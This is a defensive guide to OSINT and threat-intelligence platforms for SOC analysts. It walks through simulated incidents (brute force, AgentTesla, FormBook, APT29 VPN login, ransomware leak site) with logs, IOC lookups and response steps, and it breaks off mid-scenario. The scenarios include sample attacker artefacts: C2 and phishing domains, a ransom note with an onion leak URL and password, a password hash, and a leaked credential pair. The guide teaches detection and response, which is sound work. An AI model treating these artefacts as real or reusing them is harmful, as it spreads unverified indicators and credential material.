OPEN-SOURCE

INTELLIGENCE
(OSINT) TOOLS AND
PLATFORMS FOR
CYBERSECURITY
BLUE TEAMS IN 2025
WITH SCENARIO
EXAMPLES

BY IZZMIER IZZUDDIN
1. THREAT INTELLIGENCE PLATFORMS
ALIENVAULT OTX (OPEN THREAT EXCHANGE)

AlienVault OTX is a collaborative threat intelligence platform that allows users to share and
receive timely information about emerging threats, including IOCs (Indicators of
Compromise) such as malicious IPs, domains, file hashes and threat actor activity.

Use Cases:

• Search for an IP, domain, URL or file hash to determine if it is associated with known
malicious activity.
• Integrate OTX pulses into your SIEM to enrich alerts with threat context.
• Receive updates from the community regarding new malware strains or threat actor
campaigns.
• Share findings from internal incidents with the OTX community to strengthen
collective defence.

Practical Application: SOC analysts can input a suspicious IP observed in brute force
attempts into OTX and identify associated campaigns, determine if the IP was flagged
in other investigations and use the contextual data to escalate the alert severity.

Scenario Simulation: Brute Force Attack Detected — IP Investigation using AlienVault

OTX

Incident Summary

• Alert Source: SIEM (Splunk)

• Alert Name: Multiple Failed SSH Login Attempts
• Target Host: [Link]
• Timeframe: 2025-08-05 04:15:20 to 04:20:45
• Detected IP Address: [Link]
• Username Attempted: admin, root, webadmin
• Login Port: 22 (SSH)
• Failed Attempts: 128 within 5 minutes
• Internal Alert Severity: Medium

Step 1: Initial Triage

Log (from SIEM):

event_time=2025-08-05T04:16:02Z
source_ip=[Link]
destination_ip=[Link]
destination_port=22
protocol=TCP
event_type=authentication_failure
username=root
message="SSH authentication failed"

Analyst Observation:

• Rapid login failures from a single external IP targeting SSH

• Common usernames used (root, admin)
• Suggestive of brute force attempt

Step 2: Investigate IP Address using AlienVault OTX

Tool Used: [Link]

Action:

• Analyst logs into AlienVault OTX and searches the IP address [Link]

OTX Results:

• Pulse Matches: 3
• Tags: Brute Force, SSH Scanner, Mirai-like, APT Activity
• First Seen: 2025-07-24
• Last Seen: 2025-08-04
• Related Domains: [Link], ip-checker24[.]com
• Related File Hashes: e9b1a22d3f7b4b1e89045a8e3c88941c

Enrichment from Pulse:

• Pulse Title: Mirai Scanner Campaign - July 2025

• Pulse Description: "This IP was observed in a recent wave of SSH brute force
attacks originating from a compromised IoT botnet using Mirai-based payloads."
• Linked to CVE-2023-28771 (RCE in exposed routers)

Step 3: Update SIEM Alert Context with OTX Intelligence

Enrichment Summary Added to Ticket:

• The IP [Link] is known to be part of an active brute force and IoT scanning
campaign.
• The IOC appears in 3 OTX pulses, tagged with SSH scanning activity.
 • Historical data shows the IP actively used across Europe and APAC in multiple
attacks.
• MITRE ATT&CK Mapping:
o T1110: Brute Force
o T1046: Network Service Scanning
o T1589.003: Gather Victim Identity - Credentials

Step 4: SOC Decision-Making

Escalation Decision:

• Based on OTX confirmation and brute force pattern, escalate severity from Medium
to High.

Action Items:

• Block IP [Link] at perimeter firewall.

• Check other endpoints for the same source IP in logs.
• Create detection rule for SSH login attempts from high-risk IPs appearing in
AlienVault OTX.
• Subscribe to the relevant OTX Pulse to monitor similar campaigns.

Step 5: Contribute to Threat Community

Optional Analyst Contribution:

• Analyst uploads internal SSH honeypot log with anonymised data to AlienVault OTX.
• Adds custom pulse titled: Brute Force Attempt - Internal SSH Targets - August 2025
• Tags added: SSH, Brute Force, Mirai, T1110, CrowdsourcedThreatIntel
ABUSEIPDB

AbuseIPDB is a crowd-sourced database of malicious IP addresses reported for abusive

behaviour such as brute force attacks, scanning, spam and exploitation.

Use Cases:

• Check an IP address seen in firewall or SIEM logs to confirm if it has been reported
for abuse.
• Use the API to automate checking of IP addresses at scale.
• Correlate login attempts or port scans with the AbuseIPDB reputation score to
prioritise investigations.

Practical Application: An analyst investigating failed SSH logins from multiple global
IPs can check the IPs on AbuseIPDB. If multiple users report similar abuse patterns,
the IPs can be blocked or flagged for further action.

Scenario Simulation: SSH Login Failures — IP Reputation Check using AbuseIPDB

Incident Summary

• Alert Source: EDR + SIEM (Elastic)

• Alert Name: Repeated SSH Login Failures from Multiple Foreign IPs
• Target Host: [Link] ([Link])
• Port: 22 (SSH)
• Total Failed Attempts: 542 in 10 minutes
• Unique External IPs Involved: 4
• Internal Alert Severity: Medium

Step 1: Extract Involved IPs from SIEM Logs

Extracted IPs from logs:

• [Link]
• [Link] (already escalated via OTX in previous scenario)
• [Link]
• [Link]

Log Entry:

event_time=2025-08-05T06:02:10Z
event_type=ssh_auth_failure
source_ip=[Link]
username_attempted=admin
port=22
protocol=TCP
message="Invalid SSH login attempt"

Step 2: Investigate IP Reputation using AbuseIPDB

Tool Used: [Link]

IP 1: [Link]

• Abuse Score: 98 / 100

• Reports: 420 (in last 7 days)
• Common Categories: SSH brute force, web scanning
• First Reported: 2025-07-27
• Last Reported: 2025-08-05
• ISPs: Likely compromised server in Eastern Europe

IP 2: [Link]

• Abuse Score: 85 / 100

• Reports: 301 (across global users)
• Reported Comments:
o “Automated SSH login attempts”
o “Scans on multiple ports from same subnet”

IP 3: [Link]

• Abuse Score: 4 / 100

• Reports: 2 (not consistent, last report 2 months ago)
• Comment: “Unusual web traffic, but not verified malicious”

Step 3: Enrich Alert Ticket with AbuseIPDB Findings

Context Summary:

• 2 out of 4 IPs ([Link] and [Link]) have extremely high abuse scores
and multiple global reports for SSH brute force attacks.
• [Link] appears to be low-risk based on limited reports and age of last
activity.
• Cross-reference with OTX confirms [Link] is also part of an ongoing brute
force campaign.

Step 4: SOC Decision-Making and Action Plan

Escalation:
Raise alert severity from Medium to High, due to coordinated brute force behaviour from
multiple high-reputation-abuse IPs.

Actions Taken:

• Block [Link], [Link] and [Link] at perimeter and internal

firewalls.
• Add all three IPs to the internal threat intelligence blocklist.
• Mark [Link] as low-risk but continue monitoring in SIEM for recurring
patterns.
• Create alert logic to flag any IP with AbuseIPDB score >70 that performs >20 SSH
attempts in 10 minutes.

Step 5: Automation Planning

API Integration Plan:

• Use AbuseIPDB API to enrich future SIEM alerts with abuse scores automatically.
• Create a script to query every suspicious IP seen in failed SSH attempts and tag
them with:
o abuse_score
o last_reported
o report_count
• Route enriched events to a high-fidelity detection stream.

Python API Call:

import requests

headers = {
'Key': 'YOUR_API_KEY',
'Accept': 'application/json'
}

ip = '[Link]'
response =
[Link](f'[Link]
, headers=headers)
print([Link]())
THREATFOX (BY [Link])

ThreatFox is a free community-driven threat intelligence platform focused on providing

IOCs related to malware, including IPs, domains, file hashes and malware family tags.

Use Cases:

• Submit a known malicious hash to identify associated malware and campaigns.

• Look up domains or IPs used in phishing kits or malware C2 communication.
• Download threat intelligence feeds for ingestion into SIEM or threat hunting
platforms.

Practical Application: During a malware investigation, an analyst extracts a file hash

from an infected host and checks it on ThreatFox. The platform reveals the hash is tied
to AgentTesla, with associated C2 domains that can be blocked immediately.

Scenario Simulation: Malware Infection — IOC Lookup with ThreatFox

Incident Summary

• Initial Detection: EDR (Microsoft Defender for Endpoint)

• Alert: Suspicious File Execution – Potential Keylogger
• Host: [Link]
• File Name: Invoice_Aug2025.exe
• SHA256 Hash:
39fc92096d0c8a9913e58f7bcb49e7b3ad417d9f42e902fa7fd0a4c13f1892f6
• Observed Behaviour:
o Injects into [Link]
o Spawns PowerShell and sets up scheduled task
o Exfiltrates data via HTTP POST
o Connects to [Link][.]com

Step 1: Extract File Hash and Perform Lookup in ThreatFox

Tool Used: [Link]

Action:

• Analyst enters the SHA256 hash:

39fc92096d0c8a9913e58f7bcb49e7b3ad417d9f42e902fa7fd0a4c13f1892f6 into
the ThreatFox search bar

ThreatFox Output:
 • Malware Family: AgentTesla
• IOC Type: SHA256
• Threat Type: Malware C2
• Confidence Level: High
• Tags: AgentTesla, Keylogger, Infostealer, APT-Lite, PowerShellDropper
• Related Indicators Found:
o Domains:
§ [Link][.]com
§ loginsync2[.]net
o IPs:
§ [Link]
§ [Link]
o File Hashes (other variants)
o Email used in payload config: techsync24@[Link]

Step 2: Enrich Internal Investigation with ThreatFox Data

Updated Alert Context in SIEM:

• The file executed on finance-pc07 is confirmed as AgentTesla based on ThreatFox

lookup
• Domains and IPs seen in C2 communications match ThreatFox IOC set
• MITRE ATT&CK Mapping:
o T1056.001: Keylogging
o T1113: Screen Capture
o T1071.001: Application Layer Protocol (Web Protocols)
o T1053.005: Scheduled Task

Step 3: Threat Response Actions

Immediate Containment:

• Isolate finance-pc07 from the network

• Block the following on proxy/firewall:
o [Link][.]com
o loginsync2[.]net
o [Link]
o [Link]
• Revoke user credentials from the infected host
• Check endpoint for creation of scheduled tasks or registry persistence

Step 4: Threat Hunting Across Organisation

Hunting Query Example (in Elastic):

[Link]: [Link] AND
process.command_line: "*[Link]*"

File Search Across Environment:

• Look for presence of the same SHA256 hash on other endpoints

• Query proxy logs for outbound HTTP traffic to identified C2s
• Investigate any use of the identified ProtonMail address in email metadata

Step 5: Download and Integrate ThreatFox Feeds

Action:

• Download full AgentTesla-related IOC feed from ThreatFox

• Format: CSV, JSON or STIX
• Push feed to:
o SIEM for IOC correlation
o Email gateway for domain filtering
o EDR for file hash detection
OTX PULSES

OTX Pulses are curated threat intelligence packages shared by the AlienVault OTX
community. Each pulse contains contextual IOCs related to a specific campaign, malware
family or attack technique.

Use Cases:

• Subscribe to threat actor-specific pulses to stay updated on their latest TTPs and
infrastructure.
• Enrich SIEM alerts with context from relevant pulses to improve triage decisions.
• Automatically ingest new IOCs into detection engines or threat hunting pipelines.

Practical Application: If your SIEM generates an alert for a login from a suspicious IP
and that IP is part of a pulse related to APT29, the alert can be prioritised for
immediate review with added threat context.

Scenario Simulation: OTX Pulse Matches Suspicious Login — Contextual Threat

Enrichment

Incident Summary

• Alert Source: SIEM (QRadar)

• Alert Name: Suspicious VPN Login from Foreign IP
• User: [Link]@[Link]
• Login Time: 2025-08-05 03:02:12
• Source IP: [Link]
• Location: Kazakhstan
• User Agent: Mozilla/5.0 (Linux; Android 10)
• Internal Risk: Medium (due to user previously logging in only from Malaysia)

Step 1: Initial Alert Review

Log from SIEM:

event_time=2025-08-05T03:02:12Z
user=[Link]@[Link]
source_ip=[Link]
location=Kazakhstan
device=unknown
event_type=VPN_Login_Success
message="Successful VPN login from foreign IP"

Analyst Notes:
 • Login succeeded from unfamiliar geo-location.
• User agent not previously seen for this user.
• No MFA triggered.
• Potential credential compromise.

Step 2: Lookup Source IP in OTX and Review Related Pulses

Tool Used: [Link]

Action:

• Analyst searches IP [Link] on OTX.

Result:

• IP is listed in a Pulse titled: APT29 Credential Harvesting Infrastructure - July 2025

• OTX Pulse ID: e9af12c0d7e647db9f3a716aa678c07d
• Tags: APT29, Credential Theft, VPN Abuse, SSH Scanning, Proxy Hosting
• Indicators in Pulse:
o IPs: [Link], [Link], [Link]
o Domains: vpn-login24[.]com, office365-secure[.]net
o File Hash: 7f2ab3e2b9f0a6f0aeb332e83dc5b331 (JS Keylogger)
• MITRE ATT&CK Techniques:
o T1078: Valid Accounts
o T1110.001: Password Guessing
o T1585.001: Compromise Account

Step 3: Pulse Context Added to Alert and SIEM Ticket

Pulse Enrichment Summary:

• Source IP is part of a campaign attributed to APT29 targeting remote access portals.

• This Pulse includes IOCs linked to phishing kits and stolen credentials.
• The IP has been reported in multiple credential stuffing attempts across Asia.

Step 4: Threat Response Triggered

Decision:
Elevate alert severity to High and escalate to Incident Response.

Actions:

• Immediately revoke VPN token and reset password for [Link]@[Link]

• Block IP [Link] at VPN concentrator and firewall
 • Hunt across logs for any access to internal systems by this user post-login
• Subscribe to the Pulse and import all related IOCs to:
o SIEM correlation rules
o Perimeter firewall blacklist
o Threat intelligence enrichment engine

Step 5: Subscribe and Automate OTX Pulse Feeds

Analyst subscribes to the following Pulse collections:

• APT29 Campaigns
• VPN Phishing Kits
• Cloud Credential Abuse (July–August 2025)

Automation Plan:

• Configure automatic ingestion of new OTX Pulses using API or SIEM connector
• Update detection rules to trigger enrichment from matched pulse IDs
• Use pulse tags (APT29, VPN Abuse) to prioritise related alerts
FRODO TRACKER

Frodo Tracker is a tool that detects command-and-control (C2) communications by

comparing observed DNS or HTTP(S) traffic patterns against those typically used by
malware.

Use Cases:

• Identify active malware beacons within internal network traffic.

• Profile unknown domains that show beaconing-like behaviour.
• Use behavioural patterns to detect threats that evade signature-based detection.

Practical Application: An analyst notices repeated low-volume DNS queries to a newly

registered domain. By running the traffic through Frodo Tracker, the domain is
confirmed to match known C2 beaconing patterns, triggering a high-severity
investigation.

Scenario Simulation: Detecting C2 Beaconing via DNS using Frodo Tracker

Incident Summary

• Alert Source: NDR (Network Detection and Response) sensor + DNS logs
• Alert Type: Suspicious Low-Volume Repetitive DNS Queries
• Destination Domain: [Link]
• Affected Host: [Link]
• Timeframe: 2025-08-05 01:00:00 to 03:00:00
• Frequency: One DNS request every 10 minutes (121 total)
• Internal Alert Severity: Low (Anomaly only, no matching IOC)

Step 1: Review Network Logs for Anomalous Behaviour

Extracted DNS Logs:

timestamp=2025-08-05T01:12:00Z
src_ip=[Link]
hostname=[Link]
query=[Link]
type=A
response=[Link]
flags=NOERROR

timestamp=2025-08-05T01:22:00Z
query=[Link]
...
(repeats every 10 minutes)

Analyst Notes:

• The queried domain does not appear in internal allowlists or threat feeds.
• The host is not known to contact any *.[Link] domains.
• Regular interval and subdomain entropy suggest beaconing behaviour.

Step 2: Behavioural Analysis using Frodo Tracker

Tool Used: Frodo Tracker (local instance)

Action:

• Analyst exports 3 hours’ worth of DNS logs for host-win11-lab01

• Data is fed into Frodo Tracker for analysis

Analysis Output from Frodo Tracker:

• Detected Pattern: High-entropy subdomain structure with fixed interval querying

• Classification: Matches C2 beaconing behaviour (similar to AsyncRAT and njRAT)
• Score: 92% similarity to known HTTP(S)/DNS beaconing models
• Domain Age: Registered 2 days ago
• Flags:
o Low query volume with high timing consistency
o Subdomain d1e6ccf3b does not resolve via CDN pattern
o Behavioural similarity to payload staging infrastructure

Step 3: Escalate Alert and Confirm Threat

Updated Alert Context:

• The domain [Link] is not malicious by static signature, but

shows beaconing behaviour indicative of active malware C2.
• Matches known beaconing models with over 90% similarity.
• Domain was recently registered, consistent with attacker infrastructure setup.

Step 4: Incident Response Actions

Immediate Actions:

• Block domain [Link] and all subdomains at DNS resolver and proxy level
• Isolate host-win11-lab01 from network
• Capture memory and disk image for forensic review
 • Search internal DNS logs for other hosts querying the same or similar domains
• Correlate traffic to identify possible payload delivery or lateral movement

Threat Hypothesis:

• Host may be infected with a lightweight RAT or backdoor that uses DNS for C2
• Possible initial compromise via phishing or browser exploit

Step 5: Detection Rule Creation and Long-Term Mitigation

Detection Logic Added:

• Flag hosts making repeated DNS queries to:

o Recently registered domains (less than 7 days old)
o Domains with entropy score >0.85
o Beaconing pattern (query interval within 10% jitter)

Integration:

• Frodo Tracker alerts forwarded to SIEM

• Weekly DNS beaconing scan across all endpoints enabled
MALPEDIA

Malpedia is a community-driven platform developed by Fraunhofer FKIE that provides

detailed information on malware families, including behaviours, samples, YARA rules and
classification data.

Use Cases:

• Identify malware families by matching hashes to known entries.

• Review family behaviours to predict potential lateral movement or persistence
mechanisms.
• Use YARA signatures from Malpedia in sandbox or endpoint scanning tools.

Practical Application: A security researcher discovers a suspicious executable and

matches it to the FormBook family using Malpedia. This helps determine the
malware’s data theft capabilities and potential data exfiltration vectors.

Scenario Simulation: Malware Family Attribution via Malpedia

Incident Summary

• Alert Source: EDR (CrowdStrike Falcon)

• Alert Type: Suspicious Executable Dropped via USB Media
• Host: [Link]
• Filename: [Link]
• SHA256 Hash:
72a6bcde556dca5c3b85fc9a5f7dbfdd1c4fda84376ac2e28e12cb0ed7f8a1cc
• Behaviour Observed:
o Drops DLL in temp directory
o Injects into [Link]
o Makes HTTP POST requests to [Link]
o Steals clipboard data and screenshots

Step 1: Preliminary Analysis of the File

Sandbox Results:

• Flags behaviour related to credential theft

• Suspicious string: Formgrabber, BrowserInject, KeyHook
• Attempts to access Chrome and Firefox credential stores
• Network traffic is unencrypted HTTP with formdata payloads

Step 2: Use Malpedia to Identify Malware Family

Tool Used: [Link]

Action:

• Analyst submits SHA256 hash to Malpedia search

Malpedia Result:

• Malware Family Identified: FormBook

• Classification: Info-Stealer / Keylogger
• Tags: Credential Theft, Spyware, Clipboard Hijack, Screenshot Capture
• YARA Rule Matched: formbook_autoextract_2023.yar
• Samples: Multiple samples from 2023–2025 with similar PE structure
• MITRE ATT&CK Mapping:
o T1056.001: Keylogging
o T1113: Screen Capture
o T1057: Process Discovery
o T1027: Obfuscated Files or Information

Step 3: Review Malpedia Family Behaviour Profile

Key Family Behaviours (FormBook):

• Steals credentials from browsers and email clients

• Captures keystrokes and clipboard data
• Takes periodic screenshots of active windows
• Uses injection techniques to evade detection
• Transmits data to C2 over HTTP POST requests
• Often delivered via malicious email attachments or removable media

Step 4: Apply YARA Signature and Correlate in Environment

YARA Integration:

• Analyst retrieves YARA rule for FormBook from Malpedia

• Applies rule to:
o Endpoint scanning using Velociraptor
o Sandbox for other suspected samples
o Email gateway to scan older attachments

Correlated Detection:

• Two additional files detected across user endpoints:

o [Link]
 o [Link]

These were delivered via phishing emails during the same week.

Step 5: Incident Response Actions

Containment:

• Isolate affected host sales-laptop001

• Quarantine all matched executables
• Revoke exposed credentials used in Chrome and Outlook

Eradication and Recovery:

• Reimage affected endpoint

• Update email and web filters with IOCs from Malpedia
• Push IOC feeds and YARA rules to SIEM and EDR

Threat Hunt:

• Search for communication with [Link] across 30 days

• Hunt for indicators from FormBook campaign (paths, mutexes, registry changes)
GREYNOISE

GreyNoise is a platform that analyses internet-wide scan and noise traffic to help analysts
differentiate between targeted attacks and opportunistic background noise.

Use Cases:

• Check whether a suspicious IP address is involved in global mass scanning or part

of a known threat campaign.
• Reduce false positives by filtering out benign scanning activity.
• Profile threat actor infrastructure seen across the internet.

Practical Application: A firewall log shows multiple hits from a foreign IP. GreyNoise
confirms it is part of a mass scan campaign and not targeting the organisation
specifically, allowing the alert to be deprioritised.

Scenario Simulation: Internet Scan or Targeted Attack? Investigating with GreyNoise

Incident Summary

• Alert Source: Perimeter Firewall + SIEM (Suricata + Splunk)

• Alert Type: Multiple TCP Connection Attempts from Foreign IP
• Destination IP: [Link] (external-facing web app)
• Source IP: [Link]
• Timeframe: 2025-08-05 06:33:00 to 06:37:00
• Port Targets: 80, 443, 8080, 22, 3306
• Alert Severity: Medium (based on port sweep activity)

Step 1: Review Firewall Logs

Extracted Log:

timestamp=2025-08-05T06:34:18Z
src_ip=[Link]
dest_ip=[Link]
dest_port=8080
protocol=TCP
action=DROP
reason=Unsolicited SYN
sensor=perimeter-fw01

Observation:

• Unsolicited SYN packets across multiple ports

 • No authentication attempts
• Matches signature: "Port Sweep Detected"

Step 2: Investigate Source IP using GreyNoise

Tool Used: [Link]

Action:

• Analyst queries [Link] via the GreyNoise IP Lookup Tool

GreyNoise Output:

• Classification: Benign
• Noise: True
• RIOT: False
• Last Seen: 2025-08-04
• Tags: Mass Scanner, Mirai Scanner, Linux Scanner, Port 23, Port 8080
• ASN: AS14061 (DigitalOcean)
• Reverse DNS: [Link]

Summary Statement from GreyNoise:

"This IP address has been observed scanning the entire internet for exposed services. It
does not appear to be specifically targeting your organisation."

Step 3: Decision-Making and Triage

Updated Alert Context:

• Activity is part of a known internet-wide mass scanning operation

• No indication of targeted reconnaissance or exploitation
• Source IP is classified as Noise by GreyNoise

SOC Action:

• Deprioritise the alert

• Add IP to passive blocklist (optional)
• No further investigation required
• Use this alert as input for improving false positive handling in future correlation
rules

Step 4: Enhance SIEM Detection Logic

Detection Logic Update:

• If an IP appears in GreyNoise and is classified as Noise, apply tag Internet Noise and
reduce priority score by 2
• If Noise = True and no login or exploit attempts follow, suppress after first detection
• Enable automated enrichment via GreyNoise API

GreyNoise API Query Example:

curl -s -H "key: YOUR_API_KEY" \

[Link]

Step 5: Security Posture Improvement

Outcome:

• The SOC avoids wasting analyst time on false positive scans

• Analyst documents the case as a good example of internet noise detection
• Future alerts involving this scanner pattern will be suppressed unless associated
with exploit payloads
YETI

Yeti (Your Everyday Threat Intelligence) is an open-source threat intelligence platform that
helps analysts collect organise and share structured threat data, including IOCs, TTPs and
relationships between threat entities.

Use Cases:

• Build a centralised internal repository of IOCs and threat actor data.

• Use graph-based visualisation to understand relationships between malware, IPs,
domains and threat actors.
• Enrich SIEM detections with Yeti data for triage automation.

Practical Application: During a long-term investigation of persistent phishing attacks,

the analyst uses Yeti to track relationships between domains, infrastructure, malware
hashes and targeted user groups to reveal campaign patterns and update detection
rules accordingly.

Scenario Simulation: Tracking Persistent Phishing Campaign Using Yeti

Investigation Summary

• Type of Threat: Long-running credential phishing targeting C-suite executives

• Duration: Ongoing for 3 weeks
• Observed Indicators:
o Domains: secure-m365-login[.]com, cloud-checkpoint[.]net
o IPs: [Link], [Link]
o Attachment Hashes: 72f8a4bb43d9..., 5c117dfbe3...
o Targeted Users: CEO, CFO, IT Director
• Initial Trigger: Email reported by user with spoofed login form and malicious link

Step 1: Create Campaign in Yeti

Tool Used: Yeti Web UI

Action:

• Create new campaign titled: “ExecCredPhish-APT-Summer2025”

• Tag campaign with: phishing, credential theft, business email compromise, APT-
level op

Step 2: Add and Classify Entities in Yeti

Entities Created:
 • Malware Hashes (Type: File, linked to dropper macros)
o 72f8a4bb43d9f1e02d93426e8a3d847f
o 5c117dfbe3c3c14b321dc2e1c8f64fdd
• Domains (Type: Hostname)
o secure-m365-login[.]com
o cloud-checkpoint[.]net
• IPs (Type: IPv4)
o [Link] (from domain resolution)
o [Link] (payload delivery server)
• Emails (Targeted Users)
o ceo@[Link]
o cfo@[Link]
o [Link]@[Link]
• TTPs
o T1566.001: Spearphishing Attachment
o T1056.001: Credential Theft via Fake Login
o T1598.002: Spearphishing Service
o T1204.002: Malicious File Attachment

Step 3: Visualise Relationships Using Yeti Graph View

Graph Analysis Output:

• Hashes linked to macro-enabled documents

• Documents delivered via phishing domains
• Domains hosted on shared bulletproof IPs
• IPs associated with prior Emotet campaigns (from imported OSINT feeds)
• Pattern shows:
o Domain registered → mass phishing → credential collection → dropper
delivery

Analyst Insight:

• Attack infrastructure reuses hosting and naming schemes

• Email targets rotate weekly, focused on high-value roles

Step 4: Enrich SIEM and Detection Logic

Action:

• Export list of IOCs from Yeti to JSON and STIX formats

• Ingest into SIEM (e.g., Splunk or QRadar) via threat intelligence platform
• Apply logic:
o Block and alert on connections to listed IPs/domains
 o Match incoming emails with attachment hashes
o Alert if recipient matches VIP email group

Rule Example in Splunk:

index=email_logs
| search sender_domain IN ("[Link]", "[Link]")
| where recipient_email IN ("ceo@[Link]", "cfo@[Link]")

Step 5: Update and Maintain Threat Intel Over Time

Operational Plan:

• Analysts review campaign weekly

• Update new indicators as new emails come in
• Link future infrastructure (new IPs, domains, hashes) to the same Yeti campaign
• Use campaign intelligence for red team emulation and tabletop exercises
2. DARK WEB AND PASTE SITE MONITORING
[Link]

[Link] is a free and privacy-focused dark web search engine designed to index
.onion pages. It allows security analysts to search for leaked data, credentials, threat actor
forums and discussions hidden on the Tor network.

Use Cases:

• Search for mentions of company name, employee emails or proprietary data leaked
in underground forums.
• Detect data breaches or sensitive information exposures related to your
organisation.
• Monitor for leaked source code, credentials or financial information.
• Gather threat intelligence about attacker planning or chatter involving specific
industries or technologies.

Practical Application: A SOC analyst receives an alert about a credential stuffing

attempt targeting executive logins. They query [Link] for the executive email
addresses and discover that one was listed in a leaked credential database on a dark
web forum.

Scenario Simulation: Credential Stuffing Attempt — Dark Web Intelligence via

[Link]

Incident Summary

• Alert Source: WAF + SIEM (Cloudflare + Splunk)

• Alert Type: Multiple Failed Login Attempts (Credential Stuffing Pattern)
• Target Application: [Link]
• Targeted Usernames:
o ceo@[Link]
o [Link]@[Link]
o [Link]@[Link]
• Source IPs: Spread globally (suspected via proxy/VPN)
• Timestamps: Multiple bursts of login attempts over 15 minutes

Step 1: Confirm Failed Login Pattern

Log:

{
"timestamp": "2025-08-05T08:15:24Z",
 "event_type": "login_failure",
"user": "[Link]@[Link]",
"ip": "[Link]",
"source": "[Link]",
"message": "Invalid password for existing account",
"count": 23
}

Analyst Notes:

• Bursts of failed logins within seconds

• Source IPs vary per user, likely from botnet or credential stuffing tool
• Password reset attempts initiated by attacker for some accounts

Step 2: Search Exposed Credentials using [Link]

Tool Used: [Link]

Action:

• Analyst queries for:

o "ceo@[Link]"
o "[Link]@[Link]"
o "@[Link]" (domain-wide search)
o "[Link] password"
o "internalcorp sourcecode"

[Link] Results:

• Match Found for: [Link]@[Link]

o Appears in database dump titled: Corp2025_Leaked_Logins.[Link]
o Password hash: e99a18c428cb38d5f260853678922e03
o Site listed in .onion link to forum: [Link]
o Timestamp: 2025-07-29
o Additional context: Data offered in exchange for Monero payment

Step 3: Assess Breach Scope and Intelligence Value

Enrichment Summary:

• The email [Link]@[Link] appears in a credential dump on a dark

web site
• Password hash matches format used by internal legacy system
• The file also contains usernames of other employees with similar naming structure
MITRE ATT&CK Mapping:

• T1110.004: Credential Stuffing

• T1589.002: Email Addresses
• T1596.002: Search Open Websites/Dark Web

Step 4: Incident Response Actions

Containment:

• Force password reset for [Link]@[Link]

• Check whether hash is reused across other internal systems
• Enforce MFA for all VIP users if not already enabled

Detection Update:

• Enable monitoring for multiple login failures on exec accounts

• Trigger high-priority alert for any login attempt from unknown geo-location on VIP
accounts

Dark Web Monitoring Strategy:

• Add @[Link] to continuous monitoring keywords

• Configure alerting if new leaks or chatter surface related to:
o Internal source code
o Sensitive business documents
o Executive accounts

Step 5: Reporting and Documentation

Threat Intel Report Entry:

• Incident Type: External Credential Leak

• IOC: Email [Link]@[Link]
• Source: [Link] + LeaksX Forum
• Data type: Hashed password
• Impact: Credential stuffing on public web login portal
• Status: Mitigated with password reset, further monitoring ongoing
ONIONLAND

OnionLand is another dark web search engine that indexes a large number of Tor-based
.onion domains. It provides access to dark web marketplaces, forums, blogs and leak
sites.

Use Cases:

• Perform investigative research on threat actors, leaked data and malware

marketplaces.
• Search for keywords, email addresses, IPs and file hashes that may appear in
underground markets.
• Discover dark web domains hosting cloned login portals or phishing kits.
• Monitor dark web-based job postings related to cybercrime or insider threats.

Practical Application: During a ransomware incident, investigators find a reference to

the victim’s company name on a dark web extortion site. By using OnionLand, they
discover a dedicated leak page with sample data posted, confirming the attacker’s
claim.

Scenario Simulation: Ransomware Leak Validation via OnionLand

Incident Summary

• Detection Source: Endpoint + Email Gateway

• Incident Type: Ransomware Infection (Reported by SOC)
• Affected Organisation: [Link]
• Initial Payload: Invoice_Q3Report_2025.exe
• Malware Family: BlackShadow Ransomware
• Ransom Note Found:

Hello Meditech,
We have exfiltrated 93GB of your internal files. Visit our portal at:
hxxp://[Link]/leaks/meditech-pharma
Password: R3s1st

Step 1: Verify Onion Domain via OnionLand Search

Tool Used: [Link]

Action:

• Analyst queries keywords:

o "meditech-pharma"
o "blackshadow ransomware"
 o "[Link]"
o "meditech password R3s1st"

OnionLand Results:

• Identifies indexed .onion page:

o hxxp://[Link]/leaks/meditech-pharma
o Page is titled: “Meditech Leak Zone”
o Timestamp: 2025-08-03
o Content:
§ 3 folders: /hr/, /finance/, /rnd/
§ 5 sample files visible (PDF, Excel, DB dump)
§ Contact: blackshadow@[Link]
• Password-protected ZIP file containing data sample from /rnd/ folder
• Claims of insider payroll data, R&D drug pipeline docs and email PSTs

Step 2: Confirm Validity of Leak

SOC Actions:

• Downloaded small sample file for forensics under controlled environment

• File hash:
d784f5e98383fa6c1f1dc7c85c1bc4b2bb1df0a321a4b293d5fa95117cd03377
• Internal team confirmed this data was not publicly accessible and came from R&D
server (RND-SRV03)
• Data included:
o Internal IPs: [Link]
o Project folder references
o Developer usernames and commit metadata

Step 3: Enrich Investigation and Engage Stakeholders

MITRE ATT&CK Mapping:

• T1486: Data Encrypted for Impact

• T1041: Exfiltration Over C2 Channel
• T1585.001: Establishing Online Presence — Website

Ransom Note IOC Inclusion:

• Onion domain: [Link]

• Email: blackshadow@[Link]
• Password string: R3s1st
• Reference keyword: "meditech" used in URL slug
Step 4: Remediation and Communication

Actions Taken:

• Notify legal and regulatory bodies (PDPA breach reporting)

• Prepare executive brief on ransomware group tactics
• Contact law enforcement with evidence of dark web leak
• Monitor the leak site continuously for expansion or sale attempts
• Add .onion domain and hashes to TI platforms and SIEM blacklist
SEARCHX

SearchX is an OSINT automation and dark web search interface that aggregates results
from multiple hidden services. It simplifies the process of searching multiple indexed
.onion sites at once.

Use Cases:

• Automate broad keyword searches across multiple Tor-indexed sources.

• Search for brand mentions, confidential documents or data leaks.
• Enrich threat intelligence reports by gathering screenshots or text from
underground forums.
• Detect impersonation or internal tools being sold on hacker marketplaces.

Practical Application: An analyst investigates a possible insider threat. Using

SearchX, they discover a post offering internal VPN credentials for sale, with
screenshots of company network access. The post includes indicators that help
validate the threat and launch containment.

Scenario Simulation: Insider Threat Exposure Discovered via SearchX

Incident Summary

• Initial Alert: Suspicious login from residential IP in another country

• Targeted Asset: VPN access to internal engineering network
• User Account: [Link]@[Link]
• GeoIP: Logged in from Bulgaria, while user is based in Malaysia
• SIEM Alert: Multiple failed VPN auths, then successful login
• Additional Context: Contractor’s contract had ended 2 weeks prior

Step 1: Search for Leak Using SearchX

Tool Used: [SearchX OSINT Platform] (self-hosted or cloud access)

Search Queries:

• "meditech vpn credentials"

• "[Link]"
• "remote RDP VPN access pharma"
• "contractor access internal"
• "@[Link]"

SearchX Results:
 • Hit found on dark web forum indexed by SearchX
• Forum post title: Access to Pharma VPN - Legit Internal Credentials
• Timestamp: 2025-07-28
• Content:
o Selling access to [Link]
o Screenshots of successful login to internal network panel
o Credentials: [Link]@[Link] : A8usT4kz!
o Price: 300 USD in BTC
o Forum user handle: blackvault77
o Post tagged as verified by forum mods

Step 2: Validate Leak and Cross-Check Indicators

SOC Correlation:

• Credentials listed match the user account triggered in SIEM alert

• Password complexity matches known internal password policies
